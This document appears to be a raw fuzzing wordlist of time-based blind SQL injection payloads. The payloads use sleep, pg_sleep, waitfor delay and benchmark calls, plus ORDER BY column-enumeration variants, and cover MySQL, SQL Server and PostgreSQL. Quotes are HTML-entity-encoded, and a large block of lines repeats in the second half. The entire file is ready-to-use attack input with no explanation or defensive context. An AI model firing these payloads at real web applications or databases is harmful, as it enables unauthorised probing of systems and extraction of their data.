,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
&amp;#39;;WAITFOR DELAY &amp;#39;0&amp;#58;0&amp;#58;30&amp;#39;--
sleep(5)#
1 or sleep(5)#
&amp;quot; or sleep(5)#
&amp;#39; or sleep(5)#
&amp;quot; or sleep(5)=&amp;quot;
&amp;#39; or sleep(5)=&amp;#39;
1) or sleep(5)#
&amp;quot;) or sleep(5)=&amp;quot;
&amp;#39;) or sleep(5)=&amp;#39;
1)) or sleep(5)#
&amp;quot;)) or sleep(5)=&amp;quot;
&amp;#39;)) or sleep(5)=&amp;#39;
;waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
);waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
&amp;#39;;waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
&amp;quot;;waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
&amp;#39;);waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
&amp;quot;);waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
));waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
&amp;#39;));waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
&amp;quot;));waitfor delay &amp;#39;0&amp;#58;0&amp;#58;5&amp;#39;--
benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
&amp;quot; or pg_sleep(5)--
&amp;#39; or pg_sleep(5)--
1) or pg_sleep(5)--
&amp;quot;) or pg_sleep(5)--
&amp;#39;) or pg_sleep(5)--
1)) or pg_sleep(5)--
&amp;quot;)) or pg_sleep(5)--
&amp;#39;)) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND &amp;#39;vRxe&amp;#39;=&amp;#39;vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND &amp;#39;%&amp;#39;=&amp;#39;
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)=&amp;quot;
SLEEP(5)=&amp;#39;
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)=&amp;quot;
or SLEEP(5)=&amp;#39;
waitfor delay &amp;#39;00&amp;#58;00&amp;#58;05&amp;#39;
waitfor delay &amp;#39;00&amp;#58;00&amp;#58;05&amp;#39;--
waitfor delay &amp;#39;00&amp;#58;00&amp;#58;05&amp;#39;#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&amp;amp;&amp;amp;SLEEP(5)
&amp;amp;&amp;amp;SLEEP(5)--
&amp;amp;&amp;amp;SLEEP(5)#
&amp;#39; AnD SLEEP(5) ANd &amp;#39;1
&amp;#39;&amp;amp;&amp;amp;SLEEP(5)&amp;amp;&amp;amp;&amp;#39;1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+&amp;#39;
+ SLEEP(10) + &amp;#39;
SLEEP(1)&amp;#47;*&amp;#39; or SLEEP(1) or &amp;#39;&amp;quot; or SLEEP(1) or &amp;quot;*&amp;#47;
ORDER BY SLEEP(5)
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY SLEEP(5)#
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY SLEEP(5)--
ORDER BY 1,SLEEP(5)--
ORDER BY 1,SLEEP(5),3--
ORDER BY 1,SLEEP(5),3,4--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(&amp;#39;A&amp;#39;)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND &amp;#39;vRxe&amp;#39;=&amp;#39;vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND &amp;#39;%&amp;#39;=&amp;#39;
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)=&amp;quot;
SLEEP(5)=&amp;#39;
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)=&amp;quot;
or SLEEP(5)=&amp;#39;
waitfor delay &amp;#39;00&amp;#58;00&amp;#58;05&amp;#39;
waitfor delay &amp;#39;00&amp;#58;00&amp;#58;05&amp;#39;--
waitfor delay &amp;#39;00&amp;#58;00&amp;#58;05&amp;#39;#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&amp;amp;&amp;amp;SLEEP(5)
&amp;amp;&amp;amp;SLEEP(5)--
&amp;amp;&amp;amp;SLEEP(5)#
&amp;#39; AnD SLEEP(5) ANd &amp;#39;1
&amp;#39;&amp;amp;&amp;amp;SLEEP(5)&amp;amp;&amp;amp;&amp;#39;1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+&amp;#39;
+ SLEEP(10) + &amp;#39;
SLEEP(1)&amp;#47;*&amp;#39; or SLEEP(1) or &amp;#39;&amp;quot; or SLEEP(1) or &amp;quot;*&amp;#47;